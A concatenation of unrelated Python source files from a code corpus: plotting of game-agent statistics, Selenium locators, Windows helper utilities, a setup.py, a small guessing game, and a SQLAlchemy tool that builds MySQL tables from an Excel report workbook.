        plt.plot(x, plot_data[d], label=agent_mapping[agents[d]], color=colors[d])
        # Shade the mean +/- confidence half-width band.
        y_minus_error = np.subtract(plot_data[d], stderr_data[d])
        y_plus_error = np.add(plot_data[d], stderr_data[d])
        plt.fill_between(x, y_minus_error, y_plus_error, alpha=0.2, edgecolor=None, facecolor=colors[d], linewidth=0, antialiased=True)
    plt.xticks(x, xt)
    plt.legend()
    plt.xlabel("Vision range", fontsize=16)
    plt.ylabel("suicide %", fontsize=16)
    plt.yticks(np.arange(0.0, 101.0, 10.0))
    plt.grid(color='lightgrey', linestyle='--', linewidth=1)
    plt.savefig(f'suicide_{mode}.png')
    plt.show()
def plot_event_count(event_name, mode=0):
    """Plot events-per-game vs. vision range for every agent type, with CI band.

    Saves the figure to <event_name>_<mode>.png and shows it.
    """
    plot_data = [[] for _ in range(len(agent_mapping))]
    std_err_data = [[] for _ in range(len(agent_mapping))]
    for agent in agents:
        for o in obs_options:
            events_per_game, std_err = event_count_query(event_name, game_mode=mode, observability=o, agent=agent)
            # NOTE(review): this says "Bombs" even when event_name is "pickup".
            print("Bombs in game mode " + mode_mapping[mode] + ", observability " + str(o))
            plot_data[agents.index(agent)].append(events_per_game)
            std_err_data[agents.index(agent)].append(std_err)
            print(agent_mapping[agent] + ": " + str(events_per_game) + " std.err: " + str(std_err))
    # x positions for obs_options [1, 2, 4, -1]; -1 is plotted at 11 and labeled infinity.
    x = [1, 2, 4, 11]
    xt = ['PO:1', 'PO:2', 'PO:4', '$\infty$']
    for d in range(len(plot_data)):
        plt.plot(x, plot_data[d], label=agent_mapping[agents[d]], color=colors[d])
        y_minus_error = np.subtract(plot_data[d], std_err_data[d])
        y_plus_error = np.add(plot_data[d], std_err_data[d])
        plt.fill_between(x, y_minus_error, y_plus_error, alpha=0.2, edgecolor=None, facecolor=colors[d], linewidth=0, antialiased=True)
    plt.xticks(x, xt)
    plt.legend()
    plt.xlabel("Vision range", fontsize=16)
    plt.ylabel(f"{event_name}s per game", fontsize=16)
    # Per-event y scales tuned to the observed ranges.
    if event_name == "bomb":
        plt.yticks(np.arange(0.0, 51.0, 5.0))
    elif event_name == "pickup":
        plt.yticks(np.arange(0.0, 6.0, 1.0))
    plt.grid(color='lightgrey', linestyle='--', linewidth=1)
    plt.savefig(f'{event_name}_{mode}.png')
    plt.show()
def main():
    """Entry point: render whichever plots are enabled below."""
    plot_suicides(0)  # FFA
    # plot_suicides(1)  # TEAM
    # plot_event_count("bomb", 0)
    # plot_event_count("bomb", 1)
    # plot_event_count("pickup", 0)
    # plot_event_count("pickup", 1)
if __name__ == "__main__":
    main()
|
13,139 | 35470278e2e9199daf8ccfcb68e645fa8c49bad4 | from selenium.webdriver.common.by import By
class Locator:
    """A (strategy, selector) pair used to find Selenium WebElements."""

    def __init__(self, l_type, selector):
        self.l_type, self.selector = l_type, selector

    def parameterize(self, *args):
        # Fill the '{}' placeholders in place; the locator keeps the formatted
        # selector from then on.
        self.selector = self.selector.format(*args)
class SearchPageLocators:
    """Class for google search page selectors"""
    # Text input box on the search page.
    SEARCH_BAR = Locator(By.XPATH, "//input[@type='text']")
    # Result anchor; call .parameterize(url) to fill in the target href.
    # NOTE(review): parameterize mutates this shared class-level Locator permanently.
    SEARCH_RESULT = Locator(By.XPATH, "//a[@href='{}']")
|
13,140 | c95cff27a8873fd039a4e9d8e65a147ae119e9c8 | # (c) 2019-2020 Mikhail Paulyshka
# SPDX-License-Identifier: MIT
import ctypes
import logging
import os
import platform
from .wgc_constants import USER_PROFILE_URLS
### Platform
def get_platform() -> str:
    """Map platform.system() to this module's platform id.

    Returns:
        'windows', 'macos', or 'unknown' (the unknown case is also logged).
    """
    system = platform.system()
    if system == 'Windows':
        return 'windows'
    if system == 'Darwin':
        return 'macos'
    # Lazy %-style args: logging interpolates only if the record is emitted.
    logging.error('get_platform: unknown platform %s', system)
    return 'unknown'
### Process
# Win32 CreateProcess flag: run the child detached from the parent's console.
DETACHED_PROCESS = 0x00000008
### Mutex
# Win32 access-right constants (values from winnt.h) needed to open a named mutex.
SYNCHRONIZE = 0x00100000
MUTANT_QUERY_STATE = 0x0001
STANDARD_RIGHTS_REQUIRED = 0x000F0000
MUTEX_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | MUTANT_QUERY_STATE
def is_mutex_exists(mutex_name) -> bool:
    """Return True if a named Win32 mutex exists. Windows-only (uses ctypes.windll)."""
    kerneldll = ctypes.windll.kernel32
    mutex_handle = kerneldll.OpenMutexW(MUTEX_ALL_ACCESS, 0, str(mutex_name))
    if mutex_handle != 0:
        # Open succeeded -> the mutex exists; release our handle immediately.
        kerneldll.CloseHandle(mutex_handle)
        return True
    return False
### FS
def scantree(path):
    """Recursively yield os.DirEntry objects for every file under *path*."""
    for item in os.scandir(path):
        if not item.is_dir(follow_symlinks=False):
            # Regular files and symlinks (including symlinked dirs) are yielded as-is.
            yield item
        else:
            yield from scantree(item.path)
### Names
def fixup_gamename(name):
    """Normalize short internal game codes to their display names."""
    overrides = {'STD2': 'Steel Division 2'}
    return overrides.get(name, name)
def get_profile_url(game_id: str, realm: str, user_id: str) -> str:
    """Build the public user-profile URL for *game_id*/*realm*/*user_id*.

    Returns None (and logs an error) when the game id or realm is unknown.
    """
    if game_id not in USER_PROFILE_URLS:
        logging.error('wgc_helper/get_profile_url: unknown game_id %s', game_id)
        return None
    game_urls = USER_PROFILE_URLS[game_id]
    if realm not in game_urls:
        logging.error('wgc_helper/get_profile_url: unknown realm %s', realm)
        # Bug fix: previously fell through and raised KeyError on game_urls[realm].
        return None
    return '%s/%s' % (game_urls[realm], user_id)
|
13,141 | 4746510a1b1f34132cfad80da1547d00b687c119 | # Copyright 2017 Janos Czentye, Balazs Nemeth, Balazs Sonkoly
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
from nffg import VERSION
MODULE_NAME = "nffg"
# Package metadata for the NFFG (Network Function Forwarding Graph) library.
setup(name=MODULE_NAME,
      version=VERSION,
      description="Network Function Forwarding Graph",
      author="Janos Czentye, Balazs Nemeth, Balazs Sonkoly",
      long_description="Python-based implementation of "
                       "Network Function Forwarding Graph used by ESCAPE",
      classifiers=[
        'Development Status :: 4 - Beta',
        "Intended Audience :: Telecommunications Industry",
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python :: 2.7',
        'Topic :: Software Development :: Libraries :: Python Modules'
      ],
      keywords='networking NFV BiSBiS forwarding',
      url="http://sb.tmit.bme.hu/escape",
      # NOTE(review): the "{name}" placeholders are literal and never substituted --
      # confirm whether a concrete address was intended here.
      author_email="{name}.{name}@tmit.bme.hu",
      maintainer="Janos Czentye",
      maintainer_email="czentye@tmit.bme.hu",
      license="Apache 2.0",
      install_requires=[
        "networkx>=1.11"
      ],
      # Map the package root to the repository root so "." installs as "nffg".
      package_dir={MODULE_NAME: "."},
      packages=[MODULE_NAME],
      scripts=["nffg_diff.py"],
      include_package_data=True,
      zip_safe=False)
|
13,142 | 5f391511d3b4ced69ad0dff37b573f1dd19945ef | ksql="""create stream clickevents(
uri int,
)
WITH(KAFKA_TOPIC="",VALUE_FORMAT="AVRO")
""" |
13,143 | c8a676327d51f65f084217b43de089924c2df86a | import random
# Version 1: pick a random number with random.choice and compare to the user's guess.
# NOTE(review): the tuple includes 0 but the prompt asks for 1-5 -- confirm intended range.
lista = (0, 1, 2, 3, 4, 5)
num1 = random.choice(lista)
#print(num1)
print('Pensei em um numero, tente adivinhar...')
num2 = int(input('Digite um numero de 1 a 5: '))
print('voce acertou o numero escolido!' if num1==num2 else 'voce errou o numero é {}'.format(num1))
print('Parabens!!!'if num1==num2 else'Tente outro vez!')
#---------
# --- or: alternative version below ---
#---------
from random import randint
from time import sleep
computador = randint(0, 5)  # pick a random number in the range (0 included here too)
print('-=-'*20)
print('Vou pensar em um numero entre 0 e 5 tente advinhar: ')
print('-=-'*20)
jogador =int(input('Digite um numero de 1 a 5: '))  # the player makes a guess
print('Processando...')
sleep(3)  # artificial suspense delay
if jogador == computador:
    print('Parabéns voce conseguiu me vencer!')
else:
    print('Ganhei! eu pensei no número {} e nao no {}'.format(computador, jogador))
|
13,144 | fdd6a9fb7e1f297f3560ccd4ca2e29eec3e4956d | from cep_price_console.utils.utils import is_path_exists_or_creatable, creation_date
from cep_price_console.db_management.server_utils import mysql_login_required
from cep_price_console.utils.log_utils import debug, CustomAdapter
from cep_price_console.utils.excel_utils import Workbook
import cep_price_console.db_management.server_utils as server_utils
from cep_price_console.utils import config
from sqlalchemy.schema import CreateSchema
from sqlalchemy.sql import text
# from sqlalchemy.ext.declarative import DeferredReflection
# noinspection PyUnresolvedReferences
from sqlalchemy import exc, and_, select, or_, func
import importlib
import logging
import datetime
import os
import csv
import textwrap
reflected = False
creation_module = None
@debug(lvl=logging.DEBUG, prefix='')
def get_creation_module():
    """Lazily import ARW_PRF_Creation, clearing reflected MySQL metadata first."""
    global creation_module
    if creation_module is not None:
        return creation_module
    # First call: drop every previously reflected table so the creation module
    # starts from clean MetaData.
    metadata = server_utils.mysql_base.metadata
    for tbl_name in list(metadata.tables.keys()):
        metadata.remove(metadata.tables[tbl_name])
    creation_module = importlib.import_module("cep_price_console.db_management.ARW_PRF_Creation")
    return creation_module
class ArwPrfImporter(object):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    @debug(lvl=logging.DEBUG, prefix='')
    @mysql_login_required
    def __init__(self, relative_filename):
        # Path to the ARW/PRF definition workbook, relative to the configured root.
        self.relative_filename = relative_filename
        self.wb_cls = Workbook(relative_filename)  # spreadsheet wrapper used for all reads
        self.session = server_utils.mysql_session_maker()  # dedicated SQLAlchemy session
    @debug(lvl=logging.DEBUG)
    def investigate_arw_prf_xl(self):
        """Validate every worksheet and, for conformant ones, build its field map."""
        for sheet_name in self.wb_cls.ws_lst:
            prf_obj = self.ws_format_check(sheet_name)
            if prf_obj is not None:  # None means the sheet failed format validation
                self.field_instantiation(prf_obj)
            self.wb_cls.wb.unload_sheet(sheet_name)  # release the sheet's memory
    @debug(lvl=logging.DEBUG)
    def ws_format_check(self, sheet_name):
        """Validate rows 1-3 of every column on *sheet_name*.

        Row 1: 'Y' (ARW import), 'S' (static), 'N', or the 'MySQL File?' header.
        Row 2: a .CSV export path or 'N/A' (for 'S' columns: a master table name).
        Row 3: the table name; columns <= 22 must match the fixed arw_col_list order.

        Returns a populated PrimaryReportFile on success, or None on any
        formatting error (errors are logged, not raised).
        """
        # PrimaryReportFile.clear_dict()
        formatting_error = False
        tbl_init_dict = {}
        self.wb_cls.ws_sel = sheet_name
        for col in range(1, self.wb_cls.col_count + 1):
            col_dict = dict(
                arw_or_static=None,
                table_name=None,
                filepath_or_master_table_name=None,
            )
            # Table-Level loop
            # Row 1 in every spreadsheet should have Y/N values signifying that the column
            # be considered for table import. Import only the columns w/ Y values.
            for row in range(1, 4):
                cell_val = self.wb_cls.fetch_value(row, col).formatted_value
                try:
                    cell_val = str(cell_val).strip()
                except ValueError:
                    ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Value not a string: {3}"
                                                .format(sheet_name, col, str(row), cell_val))
                else:
                    if row == 1:
                        if cell_val in ('Y', 'S', 'N', 'MySQL File?'):
                            col_dict['arw_or_static'] = cell_val
                        else:
                            formatting_error = True
                            ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, First row value not "
                                                        "'Y', 'S', 'N' or 'MySQL File?': {3}".format(sheet_name, col,
                                                                                                     row, cell_val))
                            break
                    elif row == 2:
                        # Non-static columns carry a CSV export path (or 'N/A').
                        if self.wb_cls.fetch_value(1, col).formatted_value != 'S':
                            if cell_val.strip() != "N/A":
                                if cell_val[-4:].upper() == ".CSV":
                                    fileroot = config.config["directory"]["arw_export_dir"]
                                    filepath = os.path.join(fileroot, cell_val)
                                    ArwPrfImporter.logger.log(logging.DEBUG, "filepath: {0}".format(filepath))
                                    if not is_path_exists_or_creatable(filepath):
                                        formatting_error = True
                                        ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Invalid "
                                                                    "filepath: {3}".format(sheet_name, col, row,
                                                                                           cell_val))
                                        break
                                    else:
                                        col_dict['filepath_or_master_table_name'] = filepath
                                else:
                                    formatting_error = True
                                    ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, "
                                                                "Second row value must be a filepath or "
                                                                "'N/A': {3}".format(sheet_name, col, row, cell_val))
                                    break
                            elif cell_val.strip() == "N/A":
                                col_dict['filepath_or_master_table_name'] = cell_val
                        # Static ('S') columns carry the master table name instead.
                        elif self.wb_cls.fetch_value(1, col).formatted_value == 'S':
                            col_dict['filepath_or_master_table_name'] = cell_val
                    elif row == 3:
                        # table_name = None
                        ArwPrfImporter.logger.log(logging.NOTSET,
                                                  "Sheet Name: {0}, Column: {1}, Row: {2}, "
                                                  "ARW Column List: {3}, Cell Value: {4}"
                                                  .format(sheet_name, col, row, arw_col_list.get(str(col)), cell_val))
                        # The first 22 columns are fixed and must appear in order.
                        if col <= 22:
                            if arw_col_list.get(str(col)) != cell_val:
                                formatting_error = True
                                ArwPrfImporter.logger.error("Sheet Name: {0}, Column: {1}, Row: {2}, Column Ordering "
                                                            "Error: {3}".format(sheet_name, col, row, cell_val))
                                break
                            elif arw_col_list.get(str(col)) == cell_val:
                                col_dict['table_name'] = cell_val
                        else:
                            col_dict['table_name'] = cell_val
            if formatting_error:
                break
            # ArwPrfImporter.logger.log(logging.NOTSET, "Sheet Name: {0}, Column: {1}".format(sheet_name, col))
            # for str_key in col_dict.keys():
            #     str_value = col_dict.get(str_key)
            #     ArwPrfImporter.logger.log(logging.DEBUG, "Key: {0}, Value: {1}".format(str_key, str_value))
            # Only columns past the fixed 22 define importable tables.
            if col > 22:
                tbl_init_dict[str(col)] = col_dict
        if not formatting_error:
            prf_obj = PrimaryReportFile(self.session, sheet_name)
            for col_key in sorted(tbl_init_dict.keys(), key=lambda x: int(x)):
                col_value = tbl_init_dict.get(col_key)
                ArwPrfImporter.logger.log(logging.NOTSET, "Key: {0}, Value: {1}".format(col_key, col_value.values()))
            prf_obj.tbl_init_dict = tbl_init_dict
            self.table_instantiation(prf_obj)
            return prf_obj
        else:
            return None
        # self.wb_cls.wb.unload_sheet(sheet_name)
    @debug(lvl=logging.DEBUG)
    def table_instantiation(self, prf_obj):
        """Build table objects per column: 'Y' -> Current + Archive, 'S' -> Static."""
        for col in sorted(prf_obj.tbl_init_dict.keys(), key=lambda x: int(x)):
            col_dict = prf_obj.tbl_init_dict.get(col)
            if col_dict.get('arw_or_static') == 'Y':
                # ARW-imported column: paired current/archive tables share the base name.
                current_table = CurrentTable(
                    session=self.session,
                    prf_name=prf_obj.filename,
                    prf_col=int(col),
                    base_table_name=col_dict.get('table_name'),
                    table_name=col_dict.get('table_name') + "_01_current",
                    filepath=col_dict.get('filepath_or_master_table_name'))
                prf_obj.current_tbl_dict[col] = current_table
                archive_table = ArchiveTable(
                    session=self.session,
                    prf_name=prf_obj.filename,
                    prf_col=int(col),
                    base_table_name=col_dict.get('table_name'),
                    table_name=col_dict.get('table_name') + "_02_archive",
                    filepath=col_dict.get('filepath_or_master_table_name'))
                prf_obj.archive_tbl_dict[col] = archive_table
            elif col_dict.get('arw_or_static') == 'S':
                # Static column: a single table tied to a master table name.
                static_table = StaticTable(
                    session=self.session,
                    prf_name=prf_obj.filename,
                    prf_col=int(col),
                    base_table_name=col_dict.get('table_name'),
                    table_name=col_dict.get('table_name') + "_01_static",
                    master_table_name=col_dict.get('filepath_or_master_table_name'))
                prf_obj.static_tbl_dict[col] = static_table
    @debug(lvl=logging.DEBUG)
    def field_instantiation(self, prf_obj):
        """Read spreadsheet rows 4+ into Field objects and attach each to every
        table whose column holds an integer ordering value on that row."""
        self.wb_cls.ws_sel = prf_obj.sheetname
        col_num_list = list(prf_obj.current_tbl_dict.keys()) + list(prf_obj.archive_tbl_dict.keys()) + list(
            prf_obj.static_tbl_dict.keys())
        col_num_list = [int(x) for x in list(set(col_num_list))]
        # print(col_num_list)
        for row in range(4, self.wb_cls.row_count + 1):
            try:
                # Fixed field-definition columns A-U describe one field per row.
                # NOTE(review): notes= reads column "A" (same as arw_name) -- confirm
                # whether a different column was intended.
                new_field = Field(
                    arw_name=self.wb_cls.fetch_value(row, "A").formatted_value,
                    logical_field=self.wb_cls.fetch_value(row, "B").formatted_value,
                    tag=self.wb_cls.fetch_value(row, "C").formatted_value,
                    length=self.wb_cls.fetch_value(row, "D").formatted_value,
                    nested=self.wb_cls.fetch_value(row, "E").formatted_value,
                    desc=self.wb_cls.fetch_value(row, "F").formatted_value,
                    column_name=self.wb_cls.fetch_value(row, "H").formatted_value,
                    data_type=self.wb_cls.fetch_value(row, "I").formatted_value,
                    fill=self.wb_cls.fetch_value(row, "J").formatted_value,
                    primary_key=self.wb_cls.fetch_value(row, "K").formatted_value,
                    nullable=self.wb_cls.fetch_value(row, "L").formatted_value,
                    unique=self.wb_cls.fetch_value(row, "M").formatted_value,
                    index=self.wb_cls.fetch_value(row, "N").formatted_value,
                    binary_col=self.wb_cls.fetch_value(row, "O").formatted_value,
                    auto_incremental=self.wb_cls.fetch_value(row, "P").formatted_value,
                    generated=self.wb_cls.fetch_value(row, "Q").formatted_value,
                    static_key=self.wb_cls.fetch_value(row, "R").formatted_value,
                    dflt_exp=self.wb_cls.fetch_value(row, "U").raw_raw_val,
                    notes=self.wb_cls.fetch_value(row, "A").formatted_value,
                )
            except ValueError as err:
                # Prepend location context to the original error and log it;
                # the row is skipped rather than aborting the sheet.
                if not err.args:
                    err.args = ('',)
                err.args = ("Sheet Name: {0}, Row: {1}"
                            .format(prf_obj.sheetname,
                                    row),
                            ) + err.args
                ArwPrfImporter.logger.error(err.args)
            else:
                for col in sorted(col_num_list):
                    try:
                        # An integer in a table's column = this field's position in that table.
                        order = int(self.wb_cls.fetch_value(row, col).formatted_value)
                    except ValueError:
                        ArwPrfImporter.logger.log(
                            logging.DEBUG, "Value is not an integer. Field not appended to any dictionary.")
                    else:
                        current_tbl_obj = prf_obj.current_tbl_dict.get(str(col))
                        if current_tbl_obj is not None:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
                                    col, current_tbl_obj.table_name))
                            current_tbl_obj.fields[str(order)] = new_field
                        else:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Column: {0}. Current Table Dictionary. Get returned 'None'".format(col))
                        archive_tbl_obj = prf_obj.archive_tbl_dict.get(str(col))
                        if archive_tbl_obj is not None:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
                                    col, archive_tbl_obj.table_name))
                            archive_tbl_obj.fields[str(order)] = new_field
                        else:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Column: {0}. Archive Table Dictionary. Get returned 'None'".format(col))
                        static_tbl_obj = prf_obj.static_tbl_dict.get(str(col))
                        if static_tbl_obj is not None:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Column: {0}, Table: {1}, Value is an integer. Field appended to dictionary.".format(
                                    col, static_tbl_obj.table_name))
                            static_tbl_obj.fields[str(order)] = new_field
                        else:
                            ArwPrfImporter.logger.log(
                                logging.DEBUG,
                                "Row: {1}, Column: {0}. Static Table Dictionary. Get returned 'None'".format(col, row))
        # Let every table finalize its field map (all dictionaries combined).
        tbl_obj_lst = \
            list(prf_obj.current_tbl_dict.values()) + \
            list(prf_obj.archive_tbl_dict.values()) + \
            list(prf_obj.static_tbl_dict.values())
        for tbl_obj in tbl_obj_lst:
            tbl_obj.post_field_instantiation()
        # self.wb_cls.wb.unload_sheet(prf_obj.sheetname)
    @debug(lvl=logging.DEBUG)
    def write_module_file(self, creation=False, mapping=False):
        """Generate a SQLAlchemy source module from the registered Primary Report Files.

        Exactly one of *creation*/*mapping* must be True:
        ``creation`` writes ARW_PRF_Creation.py (table-creation statements),
        ``mapping`` writes ARW_PRF_Mapping.py (declarative mapping statements).

        If no Primary Report Files have been registered yet, the workbook is
        (re)investigated and this method calls itself again.

        :param creation: write the creation module.
        :param mapping: write the mapping module.
        :raises ValueError: when zero or both of *creation*/*mapping* are set.
        """
        # bool(dict.values()) is True iff at least one PRF is registered.
        if bool(PrimaryReportFile.prf_dict.values()):
            filename = None
            # Require exactly one mode flag (True counts as 1 in the sum).
            if sum([creation, mapping]) != 1:
                raise ValueError
            elif creation:
                filename = config.SOURCE_PATH / "cep_price_console" / "db_management" / "ARW_PRF_Creation.py"
                # "w" truncates any previous module; write the import header.
                with filename.open("w") as module_file:
                    print("from sqlalchemy.ext.declarative import DeferredReflection", file=module_file)
                    print("from sqlalchemy import Column, Table, func", file=module_file)
                    print("from sqlalchemy.sql import case, and_, or_, literal", file=module_file)
                    print("from sqlalchemy.ext.hybrid import hybrid_property", file=module_file)
                    print("from sqlalchemy.types import Date, DateTime, Integer, Numeric, String, Time",
                          file=module_file)
                    print("from sqlalchemy.dialects.mysql import LONGTEXT", file=module_file)
                    print("import cep_price_console.db_management.server_utils as server_utils\n\n", file=module_file)
            elif mapping:
                filename = config.SOURCE_PATH / "cep_price_console" / "db_management" / "ARW_PRF_Mapping.py"
                with filename.open("w") as module_file:
                    print("from sqlalchemy.ext.declarative import DeferredReflection", file=module_file)
                    print("from sqlalchemy import Table, func", file=module_file)
                    print("from sqlalchemy.sql import case, and_, or_, literal", file=module_file)
                    print("from sqlalchemy.ext.hybrid import hybrid_property", file=module_file)
                    print("import cep_price_console.db_management.server_utils as server_utils\n\n", file=module_file)
            # Re-open in append mode to add provenance comments and the
            # shared declarative base, then one statement per table.
            with filename.open("a") as module_file:
                filename_statement = "Workbook Filename: {0}\n".format(self.wb_cls.xl_fullpath_pretty)
                max_length = 110
                # Break the provenance line into comment lines of <= 110 chars.
                fmt_string = "# " + "\n# ".join([filename_statement[i:i + max_length] for i in
                                                 range(0, len(filename_statement), max_length)])
                print(fmt_string, file=module_file)
                print("# Timestamp: {0}".format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")),
                      file=module_file)
                print("\n", file=module_file)
                print("class InformReflection(DeferredReflection, server_utils.mysql_base):", file=module_file)
                print("    __abstract__ = True\n\n", file=module_file)
                for prf_obj in PrimaryReportFile.prf_dict.values():
                    ArwPrfImporter.logger.log(logging.NOTSET, "Primary Report File: {0}".
                                              format(prf_obj.sheetname))
                    # Emit current, archive, and static tables, sorted by name.
                    tbl_obj_lst = \
                        list(prf_obj.current_tbl_dict.values()) + \
                        list(prf_obj.archive_tbl_dict.values()) + \
                        list(prf_obj.static_tbl_dict.values())
                    for tbl_obj in sorted(tbl_obj_lst, key=lambda x: x.table_name):
                        ArwPrfImporter.logger.log(logging.NOTSET, "Tablename: {0}".format(tbl_obj.table_name))
                        if creation:
                            print(tbl_obj.creation_stmt, file=module_file)
                        elif mapping:
                            print(tbl_obj.mapping_stmt, file=module_file)
        elif not bool(PrimaryReportFile.prf_dict.values()):
            # No PRFs yet: parse the workbook, then retry this same call.
            ArwPrfImporter.logger.error("Primary Report File list empty.")
            self.investigate_arw_prf_xl()
            self.write_module_file(creation, mapping)
@debug(lvl=logging.DEBUG)
def create_schemas(self):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.create_if_not_exists()
@debug(lvl=logging.DEBUG)
def drop_and_create_all_tables(self):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.drop_and_create_tables()
@debug(lvl=logging.DEBUG)
def scheduled_script(self):
if hasattr(self, 'session'):
if bool(PrimaryReportFile.prf_dict.values()):
for prf_obj in PrimaryReportFile.prf_dict.values():
prf_obj.update_schema()
schema_create_if_not_exists('pythontest')
self.fill_prod_uom()
elif not bool(PrimaryReportFile.prf_dict.values()):
ArwPrfImporter.logger.error("Primary Report File list empty.")
self.investigate_arw_prf_xl()
self.scheduled_script()
    @debug(lvl=logging.DEBUG, prefix='')
    def fill_prod_uom(self):
        """Populate Base_UOM_Factor/Base_UOM_Qty on the product-UOM table.

        Seeds the base unit on rows whose UOM_Factor_Desc is "1", then
        repeatedly propagates base-UOM data to rows whose "Of_UOM" refers to
        an already-resolved UOM, multiplying quantities up the chain, until
        no unresolved rows remain.  Statement order matters: each pass relies
        on the commits of the previous one.
        """
        # Imported locally: the mapping module is regenerated by this class,
        # so it must not be imported at module load time.
        import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
        # Pass 1: rows with factor description "1" ARE the base unit.
        base_uom_update = ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.update().where(
            ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Factor_Desc == "1"
        ).values(
            Base_UOM_Factor=ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM,
            Base_UOM_Qty=1
        )
        server_utils.mysql_engine.execute(base_uom_update)
        self.session.commit()
        # Rows still lacking both base-UOM columns drive the loop below.
        # noinspection PyPep8,PyComparisonWithNone
        no_base_uom = self.session.query(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.ID).filter(
            and_(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.is_(None),
                 ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.is_(None)))
        while no_base_uom.count() > 0:
            # Snapshot of rows whose base UOM is already known; used as the
            # join source for the next propagation level.
            # noinspection PyPep8,PyComparisonWithNone
            has_base_uom = \
                select([ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Qty,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty,
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Factor_Desc]) \
                .where(and_(
                    ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.isnot(None),
                    ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.isnot(None))) \
                .distinct() \
                .alias("has_base_uom")
            # for _ in server_utils.mysql_engine.execute(has_base_uom):
            #     ArwPrfImporter.logger.log(logging.DEBUG, _)
            # Join unresolved rows to resolved ones on (Prod_Num, Of_UOM->UOM),
            # treating NULL == NULL as a match, and multiply quantities.
            # noinspection PyPep8,PyComparisonWithNone
            update_next_uom_level = ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.update().where(and_(
                or_(
                    and_(
                        ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num.is_(None),
                        has_base_uom.c.Prod_Num.is_(None)),
                    ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Prod_Num == has_base_uom.c.Prod_Num),
                or_(
                    and_(
                        ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM.is_(None),
                        has_base_uom.c.UOM.is_(None)),
                    ARW_PRF_Mapping.prod_uom_v2_01_current.Of_UOM == has_base_uom.c.UOM),
                and_(ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Factor.is_(None),
                     ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.Base_UOM_Qty.is_(None)))) \
                .values(Base_UOM_Factor=has_base_uom.c.Base_UOM_Factor,
                        Base_UOM_Qty=(has_base_uom.c.Base_UOM_Qty *
                                      ARW_PRF_Mapping.prod_uom_v2_01_current.__table__.c.UOM_Qty))
            server_utils.mysql_engine.execute(update_next_uom_level)
            self.session.commit()
@debug(lvl=logging.DEBUG, prefix='')
def recreate(self):
if hasattr(self, 'session'):
self.write_module_file(creation=True)
get_creation_module()
self.create_schemas()
self.drop_and_create_all_tables()
self.write_mapping()
@debug(lvl=logging.DEBUG, prefix='')
def write_mapping(self):
if hasattr(self, 'session'):
self.write_module_file(mapping=True)
self.scheduled_script()
# Workbook column headers for the ARW PRF sheet, keyed by stringified ordinal
# ("1" through "22"), in sheet order.
arw_col_list = dict(
    zip(
        (str(i) for i in range(1, 23)),
        (
            "Name",
            "Logical Field",
            "Tag",
            "Length",
            "Nested",
            "Description",
            "|",
            "Column Name",
            "Datatype",
            "Fill",
            "PK",
            "Nullable",
            "UQ",
            "IND",
            "B",
            "AI",
            "G",
            "SK",
            "Mapping",
            "Static Name",
            "Default/ Expression",
            "Notes",
        ),
    )
)
class PrimaryReportFile(object):
    """One ARW Primary Report File: a workbook sheet backed by a MySQL schema.

    Instances register themselves in the class-level ``prf_dict`` keyed by
    sheet name, and manage the schema plus its current/archive/static tables.
    """
    logger = CustomAdapter(logging.getLogger(str(__name__)), None)
    # Registry of all instantiated PRFs, keyed by sheet name.
    prf_dict = {}
    @debug(lvl=logging.DEBUG, prefix='Primary Report File Initiated')
    def __init__(self,
                 session,
                 filename):
        """Register a new PRF.

        :param session: active SQLAlchemy session used for commits.
        :param filename: sheet name; lower-cased copy doubles as the schema name.
        """
        self.session = session
        # Schema names are lower-case; the sheet name keeps original casing.
        self.filename = filename.lower()
        self.sheetname = filename
        self.tbl_init_dict = {}
